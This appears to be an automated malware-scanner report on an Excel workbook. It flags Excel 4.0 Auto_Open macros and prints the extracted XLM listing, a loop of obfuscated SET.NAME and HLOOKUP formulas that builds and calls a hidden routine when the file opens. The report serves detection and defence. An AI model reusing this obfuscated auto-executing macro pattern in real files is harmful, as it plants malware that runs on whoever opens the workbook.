MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6856 bytes |
SHA-256: 5c70df707cf0e4d7b30d5d0e2a444e86bb8a41c3d43e3c99134405b9743d058a |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 16 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - DFWqOsU
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!F182
' 0018 21 LABEL : Cell Value, String Constant - ayaViC len=0
' 0018 20 LABEL : Cell Value, String Constant - FwCQh len=0
' 0018 27 LABEL : Cell Value, String Constant - fyIRNWlzStdu len=0
' 0018 25 LABEL : Cell Value, String Constant - gGjQoODRLV len=0
' 0018 26 LABEL : Cell Value, String Constant - GlMGBmgkfmF len=0
' 0018 25 LABEL : Cell Value, String Constant - gyjJdxieNA len=0
' 0018 24 LABEL : Cell Value, String Constant - HDzlwcbBr len=0
' 0018 27 LABEL : Cell Value, String Constant - ioIQsWiOAYak len=0
' 0018 23 LABEL : Cell Value, String Constant - JdbmICAf len=0
' 0018 22 LABEL : Cell Value, String Constant - kQIBAbX len=0
' 0018 24 LABEL : Cell Value, String Constant - MLvyOScfx len=0
' 0018 25 LABEL : Cell Value, String Constant - nLOfFzQueV len=0
' 0018 20 LABEL : Cell Value, String Constant - Nzlwl len=0
' 0018 21 LABEL : Cell Value, String Constant - qjfrvc len=0
' 0018 22 LABEL : Cell Value, String Constant - SeCSund len=0
' 0018 20 LABEL : Cell Value, String Constant - USyRw len=0
' 0018 26 LABEL : Cell Value, String Constant - UumVrRtCXDU len=0
' 0018 26 LABEL : Cell Value, String Constant - VOvvoqOuDxe len=0
' 0018 24 LABEL : Cell Value, String Constant - YEechgFUA len=0
' 0018 27 LABEL : Cell Value, String Constant - ZewozlmJDGSS len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' DFWqOsU,Q41,"",255.00000000000000000000
' DFWqOsU,Q42,"",987.00000000000000000000
' DFWqOsU,Q43,"",149.00000000000000000000
' DFWqOsU,Q44,"",73.00000000000000000000
' DFWqOsU,Q45,"",261.00000000000000000000
' DFWqOsU,Q46,"",546.00000000000000000000
' DFWqOsU,F91,"SET.NAME("VOvvoqOuDxe",0+VALUE("0"))",""
' DFWqOsU,F95,"SET.NAME("gGjQoODRLV",VOvvoqOuDxe)",""
' DFWqOsU,F100,"SET.NAME("FwCQh",VOvvoqOuDxe)",""
' DFWqOsU,F104,"SET.NAME("UumVrRtCXDU",COUNTA(YEechgFUA))",""
' DFWqOsU,F106,"SET.NAME("nLOfFzQueV",COUNTA(HDzlwcbBr))",""
' DFWqOsU,F110,[],""
' DFWqOsU,F114,"SET.NAME("SeCSund","")",""
' DFWqOsU,F118,"gGjQoODRLV",""
' DFWqOsU,F123,"SET.NAME("GlMGBmgkfmF",HLOOKUP("*",YEechgFUA,gGjQoODRLV,FALSE))",""
' DFWqOsU,F125,"JdbmICAf",""
' DFWqOsU,F128,"SET.NAME("ZewozlmJDGSS",VOvvoqOuDxe)",""
' DFWqOsU,F132,[],""
' DFWqOsU,F136,"ZewozlmJDGSS",""
' DFWqOsU,F140,"qjfrvc",""
' DFWqOsU,F142,"USyRw",""
' DFWqOsU,F146,"kQIBAbX",""
' DFWqOsU,F151,"SET.NAME("MLvyOScfx",VALUE(HLOOKUP("*",HDzlwcbBr,kQIBAbX,FALSE)))",""
' DFWqOsU,F153,"Nzlwl",""
' DFWqOsU,F158,"SeCSund",""
' DFWqOsU,F161,"FwCQh",""
' DFWqOsU,F164,NEXT(),""
' DFWqOsU,F168,"ayaViC",""
' DFWqOsU,F170,[],""
' DFWqOsU,F175,"fyIRNWlzStdu",""
' DFWqOsU,F177,NEXT(),""
' DFWqOsU,F180,RETURN(),""
' DFWqOsU,F205,"SET.NAME("ioIQsWiOAYak",F91)",""
' DFWqOsU,F210,"YEechgFUA",""
' DFWqOsU,F213,"SET.NAME("HDzlwcbBr",R89C13)",""
' DFWqOsU,F215,"SET.NAME("fyIRNWlzStdu",224)",""
' DFWqOsU,F220,"SET.NAME("gyjJdxieNA",6)",""
' DFWqOsU,F223,ioIQsWiOAYak(),""
' DFWqOsU,F224,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.